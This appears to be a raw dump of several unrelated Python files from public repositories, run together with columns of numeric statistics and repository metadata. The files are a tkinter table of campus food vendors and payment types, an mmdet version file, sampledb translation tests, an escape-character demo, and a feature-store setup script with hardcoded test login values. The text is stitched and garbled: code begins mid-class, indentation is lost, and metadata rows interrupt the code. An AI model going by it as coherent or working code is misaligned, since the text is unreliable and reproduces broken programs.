self.e = Entry(root, width=65, fg='red',font=('Arial',7,'bold'))
self.e.grid(row=r, column=c)
self.e.insert(END, NonVeg_lst[r][c])
NonVeg_lst = [('NON-VEG RESTAURANTS','ACCEPTED PAYMENT TYPES'),
('Dev Food Truck','debit/credit/cash'),
('Tommy Lunch Truck','debit/credit/cash'),
('Little Lulu','debit/credit/cash'),
('Tasty Eats','debit/credit/cash'),
('4 Brothers','debit/credit/cash'),
('New York Gyro','debit/credit/cash'),
('Mountain Pizza','debit/credit/cash'),
('Philly Halal Gyro','debit/credit/cash'),
('Mexican Grill Stand','debit/credit/cash'),
('Halal Gyro Express','debit/credit/cash'),
('Famous NY Gyro','debit/credit/cash'),
('Caribbean Feast','debit/credit/cash'),
('Sunny Halal Food','debit/credit/cash'),
('Eddies','debit/credit/cash'),
('Sexy Green Truck','debit/credit/cash'),
('Cha Cha','debit/credit/cash'),
('Eppys Truck','debit/credit/cash'),
('Ernies','debit/credit/cash'),
('E&E Gourmet Express','debit/credit/cash'),
('Chicken Heaven','debit/credit/cash'),
('Chop Chop','debit/credit/cash'),
('Kobawoo Express','debit/credit/cash'),
('Jamaican Ds','debit/credit/cash'),
('Philly Fellas Gyro Halal','debit/credit/cash'),
('Brother Pizza','debit/credit/cash'),
('Temple Teppanyaki','debit/credit/cash'),
('Foot Long','debit/credit/cash'),
('Honey','debit/credit/cash'),
('Richie Lunch Box','debit/credit/cash'),
('Samosa Deb','debit/credit/cash'),
('Top Bap','debit/credit/cash'),
('Ray Truck','debit/credit/cash'),
('Burger Tank','debit/credit/cash'),
('El Guaco Loco','debit/credit/cash'),
('Korea House','debit/credit/cash'),
('Esposito Dining Center','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('Morgan Dining Hall','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('BurgerFi','meal equivalency | debit/credit/cash | diamond dollars'),
('Saladworks','meal equivalency | debit/credit/cash | diamond dollars'),
('Which Wich','meal equivalency | debit/credit/cash | diamond dollars'),
('Chick-fil-a','meal equivalency | debit/credit/cash | diamond dollars'),
('Twisted Taco','meal equivalency | debit/credit/cash | diamond dollars'),
('Panda Express','meal equivalency | debit/credit/cash | diamond dollars'),
('Bento Sushi','meal equivalency | debit/credit/cash | diamond dollars'),
('Così','debit/credit/cash'),
('Zaydee Kosher Delicatessen','debit/credit/cash')]
total_rows = len(NonVeg_lst)
total_columns = len(NonVeg_lst[0])
# create root window
root = Tk()
t = NonVeg_Table(root)
root.mainloop()
class Vegan_Table:
def __init__(self,root):
#code for creating table
for r in range(total_rows):
for c in range(total_columns):
self.e = Entry(root, width=65, fg='green',font=('Arial',8,'bold'))
self.e.grid(row=r, column=c)
self.e.insert(END, Vegan_lst[r][c])
Vegan_lst =[('VEGAN RESTAURANTS','ACCEPTED PAYMENT TYPES'),
('Dev Food Truck','debit/credit/cash'),
('New York Gyro','debit/credit/cash'),
('Mountain Pizza','debit/credit/cash'),
('Philly Halal Gyro','debit/credit/cash'),
('Mexican Grill Stand','debit/credit/cash'),
('Halal Gyro Express','debit/credit/cash'),
('Famous NY Gyro','debit/credit/cash'),
('Sunny Halal Food','debit/credit/cash'),
('Ernies','debit/credit/cash'),
('The Fruit Salad & smoothie truck','debit/credit/cash'),
('Chicken Heaven','debit/credit/cash'),
('Fruit Salad','debit/credit/cash'),
('Philly Fellas gyro halal','debit/credit/cash'),
('Samosa Deb','debit/credit/cash'),
('Ray Truck','debit/credit/cash'),
('Vegan Tree','debit/credit/cash'),
('Subway','Diamond dollars | debit/credit/cash'),
('Esposito Dining center','Meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('Twisted Taco','meal equivalency | debit/credit/cash | diamond dollars'),
('Morgan Dining Hall','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('BurgerFi','meal equivalency | debit/credit/cash | diamond dollars'),
('Saladworks','meal equivalency | debit/credit/cash | diamond dollars'),
('Starbucks','debit/credit/cash | diamond dollars'),
('Pita and Co.','meal equivalency | debit/credit/cash | diamond dollars'),
('Panda Express','meal equivalency | debit/credit/cash | diamond dollars'),
('Jamba','debit/credit/cash'),
('Java City','debit/credit/cash'),
('Stella Café','debit/credit/cash')]
total_rows = len(Vegan_lst)
total_columns = len(Vegan_lst[0])
# create root window
root = Tk()
t = Vegan_Table(root)
root.mainloop()
| 38.676329
| 97
| 0.654384
| 1,043
| 8,006
| 4.982742
| 0.160115
| 0.268809
| 0.366558
| 0.114297
| 0.91803
| 0.902444
| 0.894939
| 0.86954
| 0.838561
| 0.821435
| 0
| 0.002056
| 0.149388
| 8,006
| 206
| 98
| 38.864078
| 0.761087
| 0.024607
| 0
| 0.785714
| 0
| 0
| 0.655777
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0.011905
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
15b8ad5b3e7c4cb2e9b0fe77dc08ed802bd722e8
| 113
|
py
|
Python
|
mmdet/version.py
|
cmdi-dlut/SMPR
|
8481982fcf5c792b154f2b4cc6648de4b42bb1ec
|
[
"Apache-2.0"
] | 5
|
2020-12-10T09:51:42.000Z
|
2021-04-30T22:02:11.000Z
|
mmdet/version.py
|
miaohxDLUT/SMPR
|
f5388d80892742eec106d19266dc79378195336f
|
[
"Apache-2.0"
] | 2
|
2020-12-14T02:53:05.000Z
|
2021-03-05T07:26:07.000Z
|
mmdet/version.py
|
cmdi-dlut/SMPR
|
8481982fcf5c792b154f2b4cc6648de4b42bb1ec
|
[
"Apache-2.0"
] | 3
|
2020-12-25T08:34:35.000Z
|
2021-05-16T15:40:55.000Z
|
# GENERATED VERSION FILE
# TIME: Sun Aug 30 00:34:46 2020
__version__ = '1.0.0+5d75636'
short_version = '1.0.0'
| 18.833333
| 32
| 0.699115
| 21
| 113
| 3.52381
| 0.714286
| 0.216216
| 0.243243
| 0.27027
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.252632
| 0.159292
| 113
| 5
| 33
| 22.6
| 0.526316
| 0.469027
| 0
| 0
| 1
| 0
| 0.315789
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
01ee5e3b354dc0818dfb7a80a5601304f887cc08
| 11,860
|
py
|
Python
|
tests/logic/test_action_type_translations.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 5
|
2020-02-13T15:25:37.000Z
|
2021-05-06T21:05:14.000Z
|
tests/logic/test_action_type_translations.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 28
|
2019-11-12T14:14:08.000Z
|
2022-03-11T16:29:27.000Z
|
tests/logic/test_action_type_translations.py
|
nilsholle/sampledb
|
90d7487a3990995ca2ec5dfd8b59d4739d6a9a87
|
[
"MIT"
] | 8
|
2019-12-10T15:46:02.000Z
|
2021-11-02T12:24:52.000Z
|
# coding: utf-8
"""
"""
import pytest
import sampledb
from sampledb.logic import actions, action_type_translations, errors
def test_set_action_type_translation():
action_type = actions.create_action_type(
admin_only=False,
show_on_frontpage=True,
show_in_navbar=True,
enable_labels=True,
enable_files=True,
enable_locations=True,
enable_publications=True,
enable_comments=True,
enable_activity_log=True,
enable_related_objects=True,
enable_project_link=True,
)
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object 1",
object_name_plural="Objects 1",
view_text="View Objects 1",
perform_text="Create Object 1"
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=action_type.id,
language_id=sampledb.logic.languages.Language.ENGLISH
)
assert action_type_translation.name == "Example Action Type"
assert action_type_translation.description == "This is an example action type"
assert action_type_translation.object_name == "Object 1"
assert action_type_translation.object_name_plural == "Objects 1"
assert action_type_translation.view_text == "View Objects 1"
assert action_type_translation.perform_text == "Create Object 1"
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type 2",
description="This is an example action type 2",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
action_type_id=action_type.id,
language_id=sampledb.logic.languages.Language.ENGLISH
)
assert action_type_translation.name == "Example Action Type 2"
assert action_type_translation.description == "This is an example action type 2"
assert action_type_translation.object_name == "Object 2"
assert action_type_translation.object_name_plural == "Objects 2"
assert action_type_translation.view_text == "View Objects 2"
assert action_type_translation.perform_text == "Create Object 2"
with pytest.raises(errors.LanguageDoesNotExistError):
action_type_translations.set_action_type_translation(
language_id=42,
action_type_id=action_type.id,
name="Example Action Type 2",
description="This is an example action type 2",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
with pytest.raises(errors.ActionTypeDoesNotExistError):
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id + 1,
name="Example Action Type 2",
description="This is an example action type 2",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
def test_get_action_translations_for_action():
action_type = actions.create_action_type(
admin_only=False,
show_on_frontpage=True,
show_in_navbar=True,
enable_labels=True,
enable_files=True,
enable_locations=True,
enable_publications=True,
enable_comments=True,
enable_activity_log=True,
enable_related_objects=True,
enable_project_link=True,
)
assert not action_type_translations.get_action_type_translations_for_action_type(action_type.id)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id, use_fallback=True)) == 1
action_type_translation = action_type_translations.get_action_type_translations_for_action_type(action_type.id, use_fallback=True)[0]
assert action_type_translation.name == f"#{action_type.id}"
assert action_type_translation.description == ''
assert action_type_translation.object_name == 'Object'
assert action_type_translation.object_name_plural == 'Objects'
assert action_type_translation.view_text == 'View Objects'
assert action_type_translation.perform_text == 'Create Object'
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object 1",
object_name_plural="Objects 1",
view_text="View Objects 1",
perform_text="Create Object 1"
)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 1
action_type_translation = action_type_translations.get_action_type_translations_for_action_type(action_type.id)[0]
assert action_type_translation.name == "Example Action Type"
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object 2",
object_name_plural="Objects 2",
view_text="View Objects 2",
perform_text="Create Object 2"
)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 2
def test_get_action_translation_for_action_in_language():
action_type = actions.create_action_type(
admin_only=False,
show_on_frontpage=True,
show_in_navbar=True,
enable_labels=True,
enable_files=True,
enable_locations=True,
enable_publications=True,
enable_comments=True,
enable_activity_log=True,
enable_related_objects=True,
enable_project_link=True,
)
with pytest.raises(errors.ActionTypeTranslationDoesNotExistError):
action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
use_fallback=True
)
assert action_type_translation.language.lang_code == 'en'
assert action_type_translation.name == f'#{action_type.id}'
assert action_type_translation.description == ''
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name='Example',
object_name_plural='Examples',
view_text='View Examples',
perform_text='Define Example'
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
)
assert action_type_translation.name == "Example Action Type"
assert action_type_translation.description == "This is an example action type"
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
use_fallback=True
)
assert action_type_translation.name == "Example Action Type"
assert action_type_translation.description == "This is an example action type"
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
name="Beispielaktionstyp",
description="Dies ist ein Beispielaktionstyp",
object_name='Beispiel',
object_name_plural='Beispiele',
view_text='Beispiele anzeigen',
perform_text='Beispiel definieren'
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
use_fallback=True
)
assert action_type_translation.name == "Beispielaktionstyp"
assert action_type_translation.description == "Dies ist ein Beispielaktionstyp"
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
name="",
description="Dies ist ein Beispielaktionstyp",
object_name='Beispiel',
object_name_plural='Beispiele',
view_text='',
perform_text='Beispiel definieren'
)
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
use_fallback=True
)
assert action_type_translation.name == "Example Action Type"
assert action_type_translation.description == "Dies ist ein Beispielaktionstyp"
assert action_type_translation.view_text == "View Examples"
action_type_translation = action_type_translations.get_action_type_translation_for_action_type_in_language(
language_id=sampledb.logic.languages.Language.GERMAN,
action_type_id=action_type.id,
use_fallback=False
)
assert action_type_translation.name == ""
assert action_type_translation.description == "Dies ist ein Beispielaktionstyp"
assert action_type_translation.view_text == ""
def test_delete_action_translation():
action_type = actions.create_action_type(
admin_only=False,
show_on_frontpage=True,
show_in_navbar=True,
enable_labels=True,
enable_files=True,
enable_locations=True,
enable_publications=True,
enable_comments=True,
enable_activity_log=True,
enable_related_objects=True,
enable_project_link=True,
)
action_type_translations.set_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id,
name="Example Action Type",
description="This is an example action type",
object_name="Object",
object_name_plural="Objects",
view_text="View Objects",
perform_text="Create Object"
)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 1
action_type_translations.delete_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id
)
assert len(action_type_translations.get_action_type_translations_for_action_type(action_type.id)) == 0
with pytest.raises(errors.ActionTypeTranslationDoesNotExistError):
action_type_translations.delete_action_type_translation(
language_id=sampledb.logic.languages.Language.ENGLISH,
action_type_id=action_type.id
)
| 42.056738
| 137
| 0.73027
| 1,437
| 11,860
| 5.631872
| 0.059847
| 0.255777
| 0.171259
| 0.113431
| 0.945138
| 0.933646
| 0.933029
| 0.919684
| 0.846163
| 0.822686
| 0
| 0.005347
| 0.195784
| 11,860
| 281
| 138
| 42.206406
| 0.843154
| 0.001096
| 0
| 0.69685
| 0
| 0
| 0.123173
| 0
| 0
| 0
| 0
| 0
| 0.15748
| 1
| 0.015748
| false
| 0
| 0.011811
| 0
| 0.027559
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bf1a21288fe8b911d6a092f6c6e2161b77b8a4cd
| 167
|
py
|
Python
|
util/test/metrics/__init__.py
|
henriquesimoes/humpback
|
ba687a71f95ef9c9c30426eefae11a69efd6f942
|
[
"BSD-3-Clause"
] | null | null | null |
util/test/metrics/__init__.py
|
henriquesimoes/humpback
|
ba687a71f95ef9c9c30426eefae11a69efd6f942
|
[
"BSD-3-Clause"
] | null | null | null |
util/test/metrics/__init__.py
|
henriquesimoes/humpback
|
ba687a71f95ef9c9c30426eefae11a69efd6f942
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .mapk import mapk, apk
from .topk import precisionk
| 23.857143
| 38
| 0.850299
| 23
| 167
| 5.565217
| 0.478261
| 0.234375
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131737
| 167
| 6
| 39
| 27.833333
| 0.882759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.2
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
174411281e4ef145d47081ba2e15a076f026de82
| 338
|
py
|
Python
|
String_Programs/escapeChar.py
|
saratkumar17mss040/Python-lab-programs
|
a2faa190acaaa30d92d4c801fd53fdc668c3c394
|
[
"MIT"
] | 3
|
2020-08-26T15:29:18.000Z
|
2020-09-03T13:49:13.000Z
|
String_Programs/escapeChar.py
|
saratkumar17mss040/Python-lab-programs
|
a2faa190acaaa30d92d4c801fd53fdc668c3c394
|
[
"MIT"
] | null | null | null |
String_Programs/escapeChar.py
|
saratkumar17mss040/Python-lab-programs
|
a2faa190acaaa30d92d4c801fd53fdc668c3c394
|
[
"MIT"
] | null | null | null |
#escape sequence character
def escapeChar():
return "\t lorem Ipsum is simply dummy text of the printing and typesetting industry.\n \t Lorem Ipsum has been the industry's standard dummy text ever since the 1500s,\n \t when an unknown printer took a galley of type and scrambled it to make a type specimen book."
print(escapeChar())
| 56.333333
| 271
| 0.772189
| 57
| 338
| 4.578947
| 0.736842
| 0.045977
| 0.084291
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 0.171598
| 338
| 5
| 272
| 67.6
| 0.917857
| 0.073965
| 0
| 0
| 0
| 0.333333
| 0.826923
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0
| 0.333333
| 0.666667
| 0.666667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 1
|
0
| 8
|
bd58e235ee74aeace242e145efa7a1164775294f
| 77,711
|
py
|
Python
|
feature_store/src/test/env_setup/create_feature_set.py
|
myles-novick/ml-workflow
|
2f9a0d3d2814941c6bd78f9dcc019870a4e8c2da
|
[
"Apache-2.0"
] | null | null | null |
feature_store/src/test/env_setup/create_feature_set.py
|
myles-novick/ml-workflow
|
2f9a0d3d2814941c6bd78f9dcc019870a4e8c2da
|
[
"Apache-2.0"
] | null | null | null |
feature_store/src/test/env_setup/create_feature_set.py
|
myles-novick/ml-workflow
|
2f9a0d3d2814941c6bd78f9dcc019870a4e8c2da
|
[
"Apache-2.0"
] | null | null | null |
from splicemachine.features import FeatureStore, FeatureType
fs = FeatureStore()
fs.set_feature_store_url('http://localhost:8000')
fs.login_fs('local','testing')
try:
fs.remove_feature_set('retail_fs','customer_lifetime', purge=True)
except:
print('Feature set doesnt exist')
# create customer lifetime metrics feature set
fs.create_feature_set(schema_name='retail_fs',table_name='customer_lifetime', primary_keys = {"CUSTOMERID":"INTEGER"}, desc='Describes customer with aggregates of their lifetime activity.')
# add customer lifetime features
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_ACTIVE_DAYS', desc='Number of distinct days in which customer has placed orders.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, tags=['Customer','Count','Active Days'], attributes={'Usefulness': "High"})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_QTY', desc='Total lifetime number of units purchased.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, tags=['Customer','Lifetime','Active Days'])
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_ITEMS_PER_ACTIVE_DAY', desc='Total lifetime average number of units purchased per active day.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=['Customer','Average','Active Days'], attributes = {'Feature quality': "Meh", 'Value':'Low'})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_REVENUE_PER_ACTIVE_DAY', desc='Total lifetime average revenue per active day.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=['Customer','Revenue','Active Days'], attributes = {'Calculation frequency': "Monthly"})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_DAYS', desc='Length of customer relationship in days.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, tags=['Customer','Relationship'])
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_DAYS_SINCE_PURCHASE', desc='Days since customer made a purchase.', feature_data_type='INTEGER', feature_type=FeatureType.continuous, attributes = {'Feature quality': "Great", 'Foo':'bar'})
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_LIFETIME_VALUE', desc='Total revenue over customer lifetime.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, tags=['Revenue','Sum'])
fs.create_feature(schema_name='retail_fs',table_name='customer_lifetime', name='CUSTOMER_START_DATE', desc='First invoice date for customer.', feature_data_type='DATE', feature_type=FeatureType.categorical, tags=['Invoice'])
fs.deploy_feature_set('retail_fs','customer_lifetime')
try:
fs.remove_feature_set('retail_fs','customer_rfm_by_category', purge=True)
except:
print('Feature set doesnt exist')
# create customer RFM profile feature set
fs.create_feature_set(schema_name='retail_fs',table_name='customer_rfm_by_category', primary_keys = {"CUSTOMERID":"INTEGER"}, desc='Describes customer by aggregating their purchases by category over multiple time windows with weekly granularity. All metrics are expressed as weekly rates keeping them within the same domain across time windows.')
# add unit rates per category features to the RFM profile
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_1W', desc='Last weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_2W', desc='Last 2 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"2"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_4W', desc='Last 4 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"4"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_8W', desc='Last 8 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"8"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_16W', desc='Last 16 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"16"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_32W', desc='Last 32 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"32"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_CLOTHING_RATE_52W', desc='Last 52 weeks units purchased count in the Clothing category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Clothing","TimeGranularity":"Week","WindowLength":"52"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_1W', desc='Last weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_2W', desc='Last 2 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"2"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_4W', desc='Last 4 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"4"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_8W', desc='Last 8 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"8"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_16W', desc='Last 16 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"16"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_32W', desc='Last 32 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"32"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_DELICATESSEN_RATE_52W', desc='Last 52 weeks units purchased count in the Deli category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Deli","TimeGranularity":"Week","WindowLength":"52"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_1W', desc='Last weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"1"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_2W', desc='Last 2 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"2"})
fs.create_feature(schema_name='retail_fs',table_name='customer_rfm_by_category', name='CUSTOMER_RFM_GARDEN_RATE_4W', desc='Last 4 weeks units purchased count in the Garden category.', feature_data_type='DOUBLE', feature_type=FeatureType.continuous, attributes={"Entity":"Customer","Calculation":"RFM","MetricType":"Rate","UnitOfMeasure":"Items","ProductCategory":"Garden","TimeGranularity":"Week","WindowLength":"4"})
